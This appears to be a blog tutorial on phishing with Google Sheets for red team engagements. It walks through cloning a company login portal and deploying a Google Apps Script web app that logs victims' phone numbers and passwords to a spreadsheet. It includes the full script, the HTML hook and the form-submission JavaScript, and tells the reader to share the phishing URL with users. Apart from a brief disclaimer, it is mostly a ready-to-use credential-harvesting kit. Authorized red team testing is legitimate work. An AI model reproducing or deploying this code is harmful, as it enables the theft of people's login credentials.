Phishing using Google Sheets for Red Team Engagements
For educational purposes only. Unlawful use of phishing techniques is prohibited. Use responsibly, with proper authorization. Creators disclaim any liability for misuse.
This method which you will see will be very useful when you are engaged in a red team assessment or any kind of social engineering assessment where the environment includes internal systems like Employee Portals and other Company-related portals. And also this will only require a simple python server to host.
Before integration of Google Sheets , you will require to clone the exact Portal or website you’re going to using as the bait. Then you will have to examine the code where username and passwords inputs are founded.
I’ll not talk about cloning a website here because there’s many sources to check on how to clone a website :)
Phishing using Google Sheets
- Navigate to Google Sheets and create a sheet
- Navigate to Extensions > App Scripts
3. Add below script to the Code.gs
// Google Apps Script code
var SPREADSHEET_ID = 'YOUR_SPREADSHEET_ID';
function doPost(e) {
var phone = e.parameter.phone;
var password = e.parameter.password;
// Open the spreadsheet using its ID
var sheet = SpreadsheetApp.openById(SPREADSHEET_ID).getActiveSheet();
// Append the data to the sheet
sheet.appendRow([phone, password]);
// Redirect to google.com
return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);
}Now Replace ‘YOUR_SPREADSHEET_ID’ with your SpreadSheet ID which can be founded in your created Google Sheet URL.
It should look like below,
Change below Input fields according to your web application
// Append the data to the sheet
sheet.appendRow([phone, password]);Change below URL which you need to redirect the user once the credentials are given
// Redirect to google.com
return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);Once changes completed, Deploy the App Script using Deploy Option
Select the Web App option as shown below
Then Authorize the Web App with your Google Account
Now Copy the sharable script URL and move to the cloned web app and a place this sharable script URL inside the <head> </head> tag
<!DOCTYPE html><html><head >
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>TEST</title>
<script src="https://script.google.com/macros/s/tttttttttttt/exec"></script>
</head> Finally, Place below code after the Login Input Form by calling your Inputs
<script>
function submitForm() {
var phone = document.getElementById("phone").value;
var password = document.getElementById("password").value;
// Call the Google Apps Script function with the form data
google.script.run.doPost({ phone: phone, password: password });
}
</script>Now Host your Web App in a VPS or your preferred environment and Test the Login Page. Once tested you will see that the Credentials are captured in the Google Sheets as below.
By this way you will not require any PHP or any other functions where you could host a simple python server in your VPS and Share the Phishing URL to the Users
Thank you for reading, and stay tuned for more insightful write-ups. Your continued support is greatly appreciated!
